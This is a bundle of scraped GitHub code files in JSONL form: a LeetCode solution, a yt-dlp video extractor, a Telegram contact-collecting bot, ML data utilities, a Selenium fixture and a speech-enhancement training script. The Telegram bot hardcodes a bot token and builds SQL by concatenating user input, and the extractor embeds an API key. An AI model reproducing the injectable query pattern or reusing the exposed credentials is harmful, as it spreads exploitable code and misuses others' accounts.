+{"seq_id":"72969273102","text":"from collections import Counter\n\n\nclass Solution:\n    def frequencySort(self, s: str) -> str:\n        # count each character, then order the (char, count) pairs by count, descending\n        dic = Counter(s)\n        dic = dict(sorted(dic.items(), key=lambda x: x[1], reverse=True))\n\n        a = ''\n        for k, v in dic.items():\n            a += k * v\n        return a","repo_name":"gauravblog-art/My_coding_journey","sub_path":"0451-sort-characters-by-frequency/0451-sort-characters-by-frequency.py","file_name":"0451-sort-characters-by-frequency.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
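# --- Annotation for the sort-characters-by-frequency record above (not a
# dataset record). Counter.most_common already yields (char, count) pairs
# sorted by count, so the manual sorted(...) call can be folded away:
from collections import Counter

def frequency_sort(s: str) -> str:
    return "".join(ch * cnt for ch, cnt in Counter(s).most_common())

assert frequency_sort("tree") in ("eert", "eetr")  # ties may come out either way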
+{"seq_id":"12470865445","text":"from .common import InfoExtractor\nfrom ..utils import (\n    ExtractorError,\n    clean_html,\n    merge_dicts,\n    parse_iso8601,\n    url_or_none,\n)\nfrom ..utils.traversal import traverse_obj\n\n\nclass AsobiChannelBaseIE(InfoExtractor):\n    _MICROCMS_HEADER = {'X-MICROCMS-API-KEY': 'qRaKehul9AHU8KtL0dnq1OCLKnFec6yrbcz3'}\n\n    def _extract_info(self, metadata):\n        return traverse_obj(metadata, {\n            'id': ('id', {str}),\n            'title': ('title', {str}),\n            'description': ('body', {clean_html}),\n            'thumbnail': ('contents', 'video_thumb', 'url', {url_or_none}),\n            'timestamp': ('publishedAt', {parse_iso8601}),\n            'modified_timestamp': ('updatedAt', {parse_iso8601}),\n            'channel': ('channel', 'name', {str}),\n            'channel_id': ('channel', 'id', {str}),\n        })\n\n\nclass AsobiChannelIE(AsobiChannelBaseIE):\n    IE_NAME = 'asobichannel'\n    IE_DESC = 'ASOBI CHANNEL'\n\n    _VALID_URL = r'https?://asobichannel\\.asobistore\\.jp/watch/(?P<id>[\\w-]+)'\n    _TESTS = [{\n        'url': 'https://asobichannel.asobistore.jp/watch/1ypp48qd32p',\n        'md5': '39df74e872afe032c4eb27b89144fc92',\n        'info_dict': {\n            'id': '1ypp48qd32p',\n            'ext': 'mp4',\n            'title': 'アイドルマスター ミリオンライブ! 765プロch 原っぱ通信 #1',\n            'description': 'md5:b930bd2199c9b2fd75951ce4aaa7efd2',\n            'thumbnail': 'https://images.microcms-assets.io/assets/d2420de4b9194e11beb164f99edb1f95/a8e6f84119f54eb9ab4ce16729239905/%E3%82%B5%E3%83%A0%E3%83%8D%20(1).png',\n            'timestamp': 1697098247,\n            'upload_date': '20231012',\n            'modified_timestamp': 1698381162,\n            'modified_date': '20231027',\n            'channel': 'アイドルマスター',\n            'channel_id': 'idolmaster',\n        },\n    }, {\n        'url': 'https://asobichannel.asobistore.jp/watch/redigiwnjzqj',\n        'md5': '229fa8fb5c591c75ce8c37a497f113f6',\n        'info_dict': {\n            'id': 'redigiwnjzqj',\n            'ext': 'mp4',\n            'title': '【おまけ放送】アイドルマスター ミリオンライブ! 765プロch 原っぱ通信 #1',\n            'description': 'md5:7d9cd35fb54425a6967822bd564ea2d9',\n            'thumbnail': 'https://images.microcms-assets.io/assets/d2420de4b9194e11beb164f99edb1f95/20e5c1d6184242eebc2512a5dec59bf0/P1_%E5%8E%9F%E3%81%A3%E3%81%B1%E3%82%B5%E3%83%A0%E3%83%8D.png',\n            'modified_timestamp': 1697797125,\n            'modified_date': '20231020',\n            'timestamp': 1697261769,\n            'upload_date': '20231014',\n            'channel': 'アイドルマスター',\n            'channel_id': 'idolmaster',\n        },\n    }]\n\n    _survapi_header = None\n\n    def _real_initialize(self):\n        token = self._download_json(\n            'https://asobichannel-api.asobistore.jp/api/v1/vspf/token', None,\n            note='Retrieving API token')\n        self._survapi_header = {'Authorization': f'Bearer {token}'}\n\n    def _process_vod(self, video_id, metadata):\n        content_id = metadata['contents']['video_id']\n\n        vod_data = self._download_json(\n            f'https://survapi.channel.or.jp/proxy/v1/contents/{content_id}/get_by_cuid', video_id,\n            headers=self._survapi_header, note='Downloading vod data')\n\n        return {\n            'formats': self._extract_m3u8_formats(vod_data['ex_content']['streaming_url'], video_id),\n        }\n\n    def _process_live(self, video_id, metadata):\n        content_id = metadata['contents']['video_id']\n        event_data = self._download_json(\n            f'https://survapi.channel.or.jp/ex/events/{content_id}?embed=channel', video_id,\n            headers=self._survapi_header, note='Downloading event data')\n\n        player_type = traverse_obj(event_data, ('data', 'Player_type', {str}))\n        if player_type == 'poster':\n            self.raise_no_formats('Live event has not yet started', expected=True)\n            live_status = 'is_upcoming'\n            formats = []\n        elif player_type == 'player':\n            live_status = 'is_live'\n            formats = self._extract_m3u8_formats(\n                event_data['data']['Channel']['Custom_live_url'], video_id, live=True)\n        else:\n            raise ExtractorError(f'Unsupported player type {player_type!r}')\n\n        return {\n            'release_timestamp': traverse_obj(metadata, ('period', 'start', {parse_iso8601})),\n            'live_status': live_status,\n            'formats': formats,\n        }\n\n    def _real_extract(self, url):\n        video_id = self._match_id(url)\n\n        metadata = self._download_json(\n            f'https://channel.microcms.io/api/v1/media/{video_id}', video_id,\n            headers=self._MICROCMS_HEADER)\n\n        info = self._extract_info(metadata)\n\n        video_type = traverse_obj(metadata, ('contents', 'video_type', 0, {str}))\n        if video_type == 'VOD':\n            return merge_dicts(info, self._process_vod(video_id, metadata))\n        if video_type == 'LIVE':\n            return merge_dicts(info, self._process_live(video_id, metadata))\n\n        raise ExtractorError(f'Unexpected video type {video_type!r}')\n\n\nclass AsobiChannelTagURLIE(AsobiChannelBaseIE):\n    IE_NAME = 'asobichannel:tag'\n    IE_DESC = 'ASOBI CHANNEL'\n\n    _VALID_URL = r'https?://asobichannel\\.asobistore\\.jp/tag/(?P<id>[a-z0-9-_]+)'\n    _TESTS = [{\n        'url': 'https://asobichannel.asobistore.jp/tag/bjhh-nbcja',\n        'info_dict': {\n            'id': 'bjhh-nbcja',\n            'title': 'アイドルマスター ミリオンライブ! 
765プロch 原っぱ通信',\n },\n 'playlist_mincount': 16,\n }, {\n 'url': 'https://asobichannel.asobistore.jp/tag/hvm5qw3c6od',\n 'info_dict': {\n 'id': 'hvm5qw3c6od',\n 'title': 'アイマスMOIW2023ラジオ',\n },\n 'playlist_mincount': 13,\n }]\n\n def _real_extract(self, url):\n tag_id = self._match_id(url)\n webpage = self._download_webpage(url, tag_id)\n title = traverse_obj(self._search_nextjs_data(\n webpage, tag_id, fatal=False), ('props', 'pageProps', 'data', 'name', {str}))\n\n media = self._download_json(\n f'https://channel.microcms.io/api/v1/media?limit=999&filters=(tag[contains]{tag_id})',\n tag_id, headers=self._MICROCMS_HEADER)\n\n def entries():\n for metadata in traverse_obj(media, ('contents', lambda _, v: v['id'])):\n yield {\n '_type': 'url',\n 'url': f'https://asobichannel.asobistore.jp/watch/{metadata[\"id\"]}',\n 'ie_key': AsobiChannelIE.ie_key(),\n **self._extract_info(metadata),\n }\n\n return self.playlist_result(entries(), tag_id, title)\n","repo_name":"Rajeshwaran2001/yt-dlp","sub_path":"yt_dlp/extractor/asobichannel.py","file_name":"asobichannel.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"6935617331","text":"# -*- coding: utf-8 -*-\nfrom email import message\nfrom genericpath import exists\nfrom operator import contains\nfrom turtle import update\nfrom matplotlib.style import context\nimport telegram\nfrom telegram.ext import Updater, CallbackContext, CommandHandler, MessageHandler, Filters\nfrom telegram import Contact, MessageId, Update\nimport logging\nimport sqlite3\n \n\n# inicialização\nupdater = Updater(token=\"5180663220:AAGRZL-gErS01fkfIU0zoRmlCQxaoFLMvV4\")\ndispatcher = updater.dispatcher\n\nbot = telegram.Bot(\"5180663220:AAGRZL-gErS01fkfIU0zoRmlCQxaoFLMvV4\")\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO) # mostrará os erros\n\nnumero = ''\n\nglobal opcoes_handler\nopcoes_handler = ''\n\n# responde o command messages /\n\n# solicita contato para o user e começa robô\ndef start(update: Update, context: CallbackContext):\n global botao\n global custom\n\n if opcoes_handler != '':\n dispatcher.remove_handler(opcoes_handler)\n\n\n \n botao = telegram.KeyboardButton('Mandar contato', request_contact = True)\n custom = [[botao]]\n reply_markup = telegram.ReplyKeyboardMarkup(custom)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"\"\"\n Ola! 
Aqui é o robô do Telegram.\n Envie seu contato para podemos prosseguir:\n \"\"\",reply_markup=reply_markup) \n \n\nstart_handler = CommandHandler('start', start)\ndispatcher.add_handler(start_handler)\n\n\n# pega o contato enviado pelo user\n# Toda mensagem retorna True\ndef mandar_opcoes(update: Update, context: CallbackContext):\n # chat_id=update.effective_chat.id -> localização da mensagem (os chats com updates)\n # update.message.text --> ultimo mensagem do chat \n # dispatcher.remove_handler(start_handler)\n reply_markup = telegram.ReplyKeyboardRemove(custom)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"\"\"\n Digite um dos números abaixo para escolher uma das opções\n 1 --> você escolheu a opção 1\n 2 --> você escolheu a opção 2 -- jpeg\n 3 --> você escolheu a opção 3 -- video\n 4 --> você escolheu a opção 4 -- pdf\n \"\"\", reply_markup=reply_markup)\n global numero\n global first_name\n global last_name\n numero = update.message.contact.phone_number\n first_name = update.message.contact.first_name\n last_name = update.message.contact.last_name\n print(f' dentro do mandar opções -> {numero}')\n # print(update.message.contact)\n # print(f\"{numero} e {first_name} {last_name}\")\n salvar()\n\n\n\n# Salvar informações no banco\n\ndef salvar():\n\n banco = sqlite3.connect('banco.db')\n cursor = banco.cursor()\n # cursor.execute(\"CREATE TABLE users (id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, numero text, first_name text, last_name text)\")\n print(f' dentro do salvar -> {numero}')\n busca_numeros = cursor.execute(\"SELECT numero FROM users\")\n \n numeros = busca_numeros.fetchall()\n\n if len(numero) > 0:\n global opcoes_handler\n opcoes_handler = MessageHandler(Filters.text, opcoes)\n dispatcher.add_handler(opcoes_handler)\n dispatcher.remove_handler(tente_novamente_handler)\n print(f' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA do salvar -> {numero}')\n\n for i in numeros:\n if i[0] == numero:\n return False\n\n\n if last_name != None:\n cursor.execute(\"INSERT INTO users VALUES(NULL, '\"+ numero + \"','\"+ first_name + \"','\"+ last_name + \"')\")\n else:\n cursor.execute(\"INSERT INTO users VALUES(NULL, '\"+ numero + \"','\"+ first_name + \"','\"+ 'VAZIO' + \"')\")\n\n\n banco.commit()\n\n \n\ndef opcoes(update: Update, context: CallbackContext):\n if update.message.text == '1':\n context.bot.send_message(chat_id=update.effective_chat.id, text='você escolheu a opção 1')\n elif update.message.text == '2':\n context.bot.send_photo(chat_id=update.effective_chat.id, photo=open('files/images.jpg', 'rb'))\n elif update.message.text == '3':\n context.bot.send_video(chat_id=update.effective_chat.id,video=open('files/realshort.mp4', 'rb'), supports_streaming=True)\n elif update.message.text == '4':\n context.bot.send_document(chat_id=update.effective_chat.id, document=open('files/report.pdf', 'rb'))\n else:\n context.bot.send_message(chat_id=update.effective_chat.id,text=\"\"\"\n Opção não existente, tente novamente\n Digite um dos números abaixo para escolher uma das opções\n 1 --> você escolheu a opção 1\n 2 --> você escolheu a opção 2\n 3 --> você escolheu a opção 3\n 4 --> você escolheu a opção 4\n \"\"\")\n\ndef tente_novamente(update: Update, context: CallbackContext):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"\"\"\n Por favor, envie seu contato para continuar. 
\\nCaso estiver usando o telegram web clique no ícone demonstrado a seguir.\n \"\"\")\n context.bot.send_photo(chat_id=update.effective_chat.id, photo=open('files/icone_contato.png', 'rb'))\n \n\n\n\ntente_novamente_handler = MessageHandler(Filters.text, tente_novamente)\ndispatcher.add_handler(tente_novamente_handler)\n\n\nmandar_opcoes_handler = MessageHandler(Filters.contact, mandar_opcoes)\ndispatcher.add_handler(mandar_opcoes_handler)\n\n# opcoes_handler = MessageHandler(Filters.text, opcoes)\n# dispatcher.add_handler(opcoes_handler)\n\nprint(f' fora -> {numero}')\n\n \n\nupdater.start_polling()","repo_name":"FelipeVidalG/telegram-bot","sub_path":"old_bot_telegram.py","file_name":"old_bot_telegram.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38160029193","text":"import numpy as np\nimport heapq\nimport pickle\nimport operator\n\n\n# Define parameters\n_TEST_RATIO = 0.15\n_VALIDATION_RATIO = 0.1\nICD_NUM = 4880 # Number of unique ICD codes\nLABEL_NUM = 272 # Number of categories for labels\nTREE_NUM = 728 # Number of knowledge ancestor nodes\nTIME_STEP = 41 # Maximum number of patient visits\n\n\ndef load_data(seqFile, labelFile, treeFile=''):\n sequences = np.array(pickle.load(open(seqFile, 'rb')))\n labels = np.array(pickle.load(open(labelFile, 'rb')))\n if len(treeFile) > 0:\n trees = np.array(pickle.load(open(treeFile, 'rb')))\n\n np.random.seed(0)\n dataSize = len(labels)\n ind = np.random.permutation(dataSize)\n nTest = int(_TEST_RATIO * dataSize)\n nValid = int(_VALIDATION_RATIO * dataSize)\n\n test_indices = ind[:nTest]\n valid_indices = ind[nTest:nTest+nValid]\n train_indices = ind[nTest+nValid:]\n\n train_set_x = sequences[train_indices]\n train_set_y = labels[train_indices]\n test_set_x = sequences[test_indices]\n test_set_y = labels[test_indices]\n valid_set_x = sequences[valid_indices]\n valid_set_y = labels[valid_indices]\n train_set_t = None\n test_set_t = None\n valid_set_t = None\n\n if len(treeFile) > 0:\n train_set_t = trees[train_indices]\n test_set_t = trees[test_indices]\n valid_set_t = trees[valid_indices]\n\n def len_argsort(seq):\n return sorted(range(len(seq)), key=lambda x: len(seq[x]))\n\n train_sorted_index = len_argsort(train_set_x)\n train_set_x = [train_set_x[i] for i in train_sorted_index]\n train_set_y = [train_set_y[i] for i in train_sorted_index]\n\n valid_sorted_index = len_argsort(valid_set_x)\n valid_set_x = [valid_set_x[i] for i in valid_sorted_index]\n valid_set_y = [valid_set_y[i] for i in valid_sorted_index]\n\n test_sorted_index = len_argsort(test_set_x)\n test_set_x = [test_set_x[i] for i in test_sorted_index]\n test_set_y = [test_set_y[i] for i in test_sorted_index]\n\n if len(treeFile) > 0:\n train_set_t = [train_set_t[i] for i in train_sorted_index]\n valid_set_t = [valid_set_t[i] for i in valid_sorted_index]\n test_set_t = [test_set_t[i] for i in test_sorted_index]\n\n train_set = (train_set_x, train_set_y, train_set_t)\n valid_set = (valid_set_x, valid_set_y, valid_set_t)\n test_set = (test_set_x, test_set_y, test_set_t)\n\n return train_set, valid_set, test_set\n\n\ndef padMatrix(seqs, labels, treeseqs=''):\n # lengths = np.array([len(seq) for seq in seqs]) - 1\n n_samples = len(seqs)\n # maxlen = np.max(lengths)\n\n x = np.zeros((n_samples, TIME_STEP, ICD_NUM), dtype=np.int8)\n y = np.zeros((n_samples, TIME_STEP, LABEL_NUM), dtype=np.int8)\n\n if len(treeseqs) > 0:\n tree = np.zeros((n_samples, TIME_STEP, TREE_NUM), 
dtype=np.int8)\n for idx, (seq, lseq, tseq) in enumerate(zip(seqs, labels, treeseqs)):\n for xvec, subseq in zip(x[idx, :, :], seq[:-1]):\n xvec[subseq] = 1.\n for yvec, subseq in zip(y[idx, :, :], lseq[1:]):\n yvec[subseq] = 1.\n for tvec, subseq in zip(tree[idx, :, :], tseq[:-1]):\n tvec[subseq] = 1.\n return x, y, tree\n\n else:\n for idx, (seq, lseq) in enumerate(zip(seqs, labels)):\n for xvec, subseq in zip(x[idx, :, :], seq[:-1]):\n xvec[subseq] = 1.\n for yvec, subseq in zip(y[idx, :, :], lseq[1:]):\n yvec[subseq] = 1.\n return x, y\n\ndef visit_level_precision(y_true, y_pred, rank=[5, 10, 15, 20, 25, 30]):\n recall = list()\n for i in range(len(y_true)):\n for j in range(len(y_true[i])):\n thisOne = list()\n codes = y_true[i][j]\n tops = y_pred[i][j]\n for rk in rank:\n thisOne.append(len(set(codes).intersection(set(tops[:rk]))) * 1.0 / min(rk, len(set(codes))))\n recall.append(thisOne)\n return (np.array(recall)).mean(axis=0).tolist()\n\n\ndef code_level_accuracy(y_true, y_pred, rank=[5, 10, 15, 20, 25, 30]):\n recall = list()\n for i in range(len(y_true)):\n for j in range(len(y_true[i])):\n thisOne = list()\n codes = y_true[i][j]\n tops = y_pred[i][j]\n for rk in rank:\n thisOne.append(len(set(codes).intersection(set(tops[:rk]))) * 1.0 / len(set(codes)))\n recall.append(thisOne)\n return (np.array(recall)).mean(axis=0).tolist()\n\n\ndef process_label(labelSeqs):\n newlabelSeq = []\n for i in range(len(labelSeqs)):\n newlabelSeq.append(labelSeqs[i][1:])\n return newlabelSeq\n\n\ndef convert2preds(preds):\n ccs_preds = []\n for i in range(len(preds)):\n temp = []\n for j in range(len(preds[i])):\n temp.append(list(zip(*heapq.nlargest(30, enumerate(preds[i][j]), key=operator.itemgetter(1))))[0])\n ccs_preds.append(temp)\n return ccs_preds","repo_name":"lywey/DMKAP","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"675893329","text":"#!/usr/bin/env python\nfrom PIL import Image\nfrom cStringIO import StringIO\nimport os\nimport base64\nimport sys\n\ndef run(data, zoom, x, y):\n here = os.path.dirname(__file__)\n full = os.path.join(here, \"worldmap.png\")\n img = Image.open(full)\n img = img.convert('RGBA')\n \n decoded_data = StringIO(base64.b64decode(data))\n decoded_img = Image.open(decoded_data)\n \n #doodle = Image.fromstring(\n decoded_size = decoded_img.size\n blank_img = Image.new('RGBA', img.size, (0,0,0,0))\n blank_img.paste(decoded_img, (200, 200))\n #blank_img.save('foo.png', format='PNG')\n img = Image.composite(blank_img, img, blank_img)\n img.save(os.path.join(here, 'worldmap-copy-pasted.png'))\n \n #open(full, \"w\").write(decoded)\n\n return 0\n\ndef test_paste():\n data = open('data.dat').read()\n \n run(data, None, None, None)\n \n \nif __name__ == '__main__':\n import sys\n sys.exit(run(*sys.argv[1:]))\n \n ","repo_name":"peterbe/gaffwall","sub_path":"static/tiles/savecanvas.py","file_name":"savecanvas.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4769174719","text":"import os\nimport pytest\nfrom selenium import webdriver\nfrom settings.config import get_driver_path\n\n\n@pytest.fixture\ndef chrome():\n options = webdriver.ChromeOptions()\n options.add_argument(\"start-maximized\")\n options.add_argument(\"disable-infobars\")\n options.add_argument(\"--disable-extensions\")\n get_driver_path() # local 
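# --- Annotation for the DMKAP utils.py record above (not a dataset record). ---
# A worked instance of its visit-level precision@k for a single visit: hits in
# the top-k predictions, normalised by min(k, number of true codes).
true_codes = {3, 7, 42}
ranked_preds = [7, 1, 42, 9, 5]  # model output, best first
k = 5
hits = len(true_codes & set(ranked_preds[:k]))
print(hits / min(k, len(true_codes)))  # 2 / min(5, 3) -> 0.666...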
environment variables are enabled\n\n    driver = webdriver.Chrome(options=options, executable_path=os.getenv('CHROME_PATH'))\n    driver.get('https://www.w3schools.com/sql/trysql.asp?filename=trysql_select_all')\n\n    yield driver\n\n    driver.close()\n","repo_name":"manifity/w3schools-trysql","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"13345731310","text":"import os\nimport argparse\nimport sys \n\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torchvision \nfrom torchvision import transforms\nfrom torch.optim.lr_scheduler import ExponentialLR\n\nimport tensorboardX\nfrom tensorboardX import SummaryWriter\n\n\nfrom scipy.io import wavfile\nimport librosa\n\nimport soundfile as sf\nfrom pystoi.stoi import stoi\nfrom pypesq import pesq\n\nfrom tqdm import tqdm\nfrom models.layers.istft import ISTFT\nimport train_utils\nfrom load_dataset import AudioDataset\nfrom models.attention import AttentionModel\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_dir', default='experiment/SE_model.json', help=\"Directory containing params.json\")\nparser.add_argument('--restore_file', default=None, help=\"Optional, name of the file in --model_dir containing weights to reload before training\") # 'best' or 'train'\nparser.add_argument('--batch_size', type=int, default=32, help='batch size for training')\nparser.add_argument('--num_epochs', default=100, type=int, help='number of training epochs')\nparser.add_argument('--dropout_p', default = 0, type=float, help='Attention model drop out rate')\nparser.add_argument('--learning_rate', default = 5e-4, type=float, help = 'Learning rate')\n# on/off flags (note: argparse's type=bool would treat any non-empty string, even 'False', as True)\nparser.add_argument('--attn_use', default=False, action='store_true')\nparser.add_argument('--stacked_encoder', default=False, action='store_true')\nparser.add_argument('--attn_len', default = 0, type = int)\nparser.add_argument('--hidden_size', default = 112, type = int)\nparser.add_argument('--ck_name', default = 'SEckpt.pt')\nargs = parser.parse_args()\n\n\nn_fft, hop_length = 512, 128\nwindow = torch.hann_window(n_fft).cuda()\n# STFT\nstft = lambda x: torch.stft(x, n_fft, hop_length, window=window)\n# ISTFT\nistft = ISTFT(n_fft, hop_length, window='hanning').cuda()\n\ndef normalized(tensor):\n    output = [[] for i in range(len(tensor))]\n\n    for i in range(len(tensor)):\n        nummer = tensor[i] - torch.min(tensor[i])\n        denomi = torch.max(tensor[i]) - torch.min(tensor[i])\n        \n        output[i] = (nummer / (denomi + 1e-5)).tolist()\n\n\n    return torch.tensor(output)\n\n\ndef main(): \n    #summary = SummaryWriter()\n    #os.system('tensorboard --logdir=path_of_log_file')\n\n    #set Hyper parameter\n    json_path = os.path.join(args.model_dir)\n    params = train_utils.Params(json_path)\n\n    #data loader\n    train_dataset = AudioDataset(data_type='train')\n    train_data_loader = DataLoader(dataset=train_dataset, batch_size=args.batch_size, collate_fn=train_dataset.collate, shuffle=True, num_workers=4)\n    test_dataset = AudioDataset(data_type='test')\n    test_data_loader = DataLoader(dataset=test_dataset, batch_size=args.batch_size, collate_fn=test_dataset.collate, shuffle=False, num_workers=4)\n    #model select\n    print('Model initializing\\n')\n    net = torch.nn.DataParallel(AttentionModel(257, hidden_size = args.hidden_size, dropout_p = args.dropout_p, use_attn = args.attn_use, stacked_encoder = 
args.stacked_encoder, attn_len = args.attn_len))\n #net = AttentionModel(257, 112, dropout_p = args.dropout_p, use_attn = args.attn_use)\n net = net.cuda()\n print(net)\n\n optimizer = optim.Adam(net.parameters(), lr=args.learning_rate)\n \n scheduler = ExponentialLR(optimizer, 0.5)\n\n #check point load\n #Check point load\n\n print('Trying Checkpoint Load\\n')\n ckpt_dir = 'ckpt_dir'\n if not os.path.exists(ckpt_dir):\n \tos.makedirs(ckpt_dir)\n\n best_PESQ = 0.\n best_STOI = 0.\n best_loss = 200000.\n ckpt_path = os.path.join(ckpt_dir, args.ck_name)\n if os.path.exists(ckpt_path):\n \tckpt = torch.load(ckpt_path)\n \ttry:\n \t net.load_state_dict(ckpt['model'])\n optimizer.load_state_dict(ckpt['optimizer'])\n best_loss = ckpt['best_loss']\n\n print('checkpoint is loaded !')\n print('current best loss : %.4f' % best_loss)\n \texcept RuntimeError as e:\n print('wrong checkpoint\\n')\n else: \n print('checkpoint not exist!')\n print('current best loss : %.4f' % best_loss)\n \n print('Training Start!')\n #train\n iteration = 0\n train_losses = []\n test_losses = []\n for epoch in range(args.num_epochs):\n train_bar = tqdm(train_data_loader)\n # train_bar = train_data_loader\n n = 0\n avg_loss = 0\n net.train()\n for input in train_bar:\n iteration += 1\n #load data\n train_mixed, train_clean, seq_len = map(lambda x: x.cuda(), input)\n\n mixed = stft(train_mixed)\n cleaned = stft(train_clean)\n mixed = mixed.transpose(1,2)\n cleaned = cleaned.transpose(1,2)\n real, imag = mixed[..., 0], mixed[..., 1]\n clean_real, clean_imag = cleaned[..., 0], cleaned[..., 1]\n mag = torch.sqrt(real**2 + imag**2)\n clean_mag = torch.sqrt(clean_real**2 + clean_imag**2)\n phase = torch.atan2(imag, real)\n \n\n #feed data\n out_mag, attn_weight = net(mag)\n out_real = out_mag * torch.cos(phase)\n out_imag = out_mag * torch.sin(phase)\n out_real, out_imag = torch.squeeze(out_real, 1), torch.squeeze(out_imag, 1)\n out_real = out_real.transpose(1,2)\n out_imag = out_imag.transpose(1,2)\n\n out_audio = istft(out_real, out_imag, train_mixed.size(1))\n out_audio = torch.squeeze(out_audio, dim=1)\n for i, l in enumerate(seq_len):\n out_audio[i, l:] = 0\n \n loss = 0\n PESQ = 0\n STOI = 0\n \n loss = F.mse_loss(out_mag, clean_mag, True)\n if torch.any(torch.isnan(loss)):\n torch.save({'clean_mag': clean_mag, 'out_mag': out_mag, 'mag': mag}, 'nan_mag')\n raise('loss is NaN')\n avg_loss += loss\n n += 1\n #gradient optimizer\n optimizer.zero_grad()\n\n \n #backpropagate LOSS\n loss.backward()\n\n\n #update weight\n optimizer.step()\n \n #for i in range(len(train_mixed)):\n # PESQ += pesq(train_clean[i].cpu().data.numpy(), out_audio[i].cpu().data.numpy(), 16000)\n # STOI += stoi(train_clean[i].cpu().data.numpy(), out_audio[i].cpu().data.numpy(), 16000, extended=False)\n #PESQ /= len(train_mixed)\n #STOI /= len(train_mixed)\n\n #flot tensorboard\n if iteration % 100 == 0 : \n print('[epoch: {}, iteration: {}] train loss : {:.4f} PESQ : {:.4f} STOI : {:.4f}'.format(epoch, iteration, loss, PESQ, STOI))\n \n avg_loss /= n\n #summary.add_scalar('Train Loss', avg_loss.item(), iteration)\n \n train_losses.append(avg_loss)\n if (len(train_losses) > 2) and (train_losses[-2] < avg_loss):\n print(\"Learning rate Decay\")\n scheduler.step()\n\n #test phase\n n = 0\n avg_test_loss = 0\n test_bar = tqdm(test_data_loader)\n\n net.eval()\n with torch.no_grad():\n for input in test_bar:\n test_mixed, test_clean, seq_len = map(lambda x: x.cuda(), input)\n mixed = stft(test_mixed)\n cleaned = stft(test_clean)\n mixed = 
mixed.transpose(1,2)\n cleaned = cleaned.transpose(1,2)\n real, imag = mixed[..., 0], mixed[..., 1]\n clean_real, clean_imag = cleaned[..., 0], cleaned[..., 1]\n mag = torch.sqrt(real**2 + imag**2)\n clean_mag = torch.sqrt(clean_real**2 + clean_imag**2)\n phase = torch.atan2(imag, real)\n \n logits_mag, logits_attn_weight = net(mag)\n logits_real = logits_mag * torch.cos(phase)\n logits_imag = logits_mag * torch.sin(phase)\n logits_real, logits_imag = torch.squeeze(logits_real, 1), torch.squeeze(logits_imag, 1)\n logits_real = logits_real.transpose(1,2)\n logits_imag = logits_imag.transpose(1,2)\n \n logits_audio = istft(logits_real, logits_imag, test_mixed.size(1))\n logits_audio = torch.squeeze(logits_audio, dim=1)\n for i, l in enumerate(seq_len):\n logits_audio[i, l:] = 0\n \n test_loss = 0\n test_PESQ = 0\n test_STOI = 0\n \n test_loss = F.mse_loss(logits_mag, clean_mag, True)\n #for i in range(len(test_mixed)):\n #librosa.output.write_wav('test_out.wav', logits_audio[i].cpu().data.numpy()[:seq_len[i].cpu().data.numpy()], 16000)\n # test_PESQ += pesq(test_clean[i].detach().cpu().numpy(), logits_audio[i].detach().cpu().numpy(), 16000)\n # test_STOI += stoi(test_clean[i].detach().cpu().numpy(), logits_audio[i].detach().cpu().numpy(), 16000, extended=False)\n \n #test_STOI /= len(test_mixed)\n avg_test_loss += test_loss\n n += 1\n #test loss\n #test_loss = wSDRLoss(test_mixed, test_clean, out_audio)\n #test_loss = torch.nn.MSELoss(out_audio, test_clean)\n\n #test accuracy\n #test_pesq = pesq('test_clean.wav', 'test_out.wav', 16000)\n #test_stoi = stoi('test_clean.wav', 'test_out.wav', 16000)\n\n avg_test_loss /= n\n test_losses.append(avg_test_loss)\n #summary.add_scalar('Test Loss', avg_test_loss.item(), iteration)\n print('[epoch: {}, iteration: {}] test loss : {:.4f} PESQ : {:.4f} STOI : {:.4f}'.format(epoch, iteration, avg_test_loss, test_PESQ, test_STOI))\n if avg_test_loss < best_loss:\n best_PESQ = test_PESQ\n best_STOI = test_STOI\n best_loss = avg_test_loss\n # Note: optimizer also has states ! 
don't forget to save them as well.\n ckpt = {'model':net.state_dict(),\n 'optimizer':optimizer.state_dict(),\n 'best_loss':best_loss}\n torch.save(ckpt, ckpt_path)\n print('checkpoint is saved !')\n\nif __name__ == '__main__':\n main()\n","repo_name":"chanil1218/Attention-SE.pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10403,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"} +{"seq_id":"29230455751","text":"import numpy as np\n\nMAX = 75\n\ndef gettimestamp(t):\n s = t % 10\n if s == 0:\n s = 10\n c = t // 10 \n if t % 10 != 0:\n c += 1\n return (t, s, c)\nvals = [0] * 10\nfor i in range(1, MAX + 1):\n vals[i % 10] += 1\nM2 = 0\nfor acumulado in vals:\n M2 += acumulado ** 2\n\nprint(\"M2: {}\".format(M2))\n\n# for i in range(0, 10):\n# timestamps = []\n# Ms = []\n# for j in range(0, 3):\n# x = np.random.randint(1, MAX + 1)\n# tupla = gettimestamp(x)\n# timestamps.append(tupla)\n# Ms.append((x * (2 * tupla[2] - 1)))\n# print(\"{}: med={} prom={} M2/med={} M2/prom={}\".format(timestamps, np.round(np.median(Ms), decimals=3), \n# np.round(np.mean(Ms), decimals=3), \n# np.round(M2 / np.median(Ms), decimals=3), \n# np.round(M2 / np.mean(Ms), 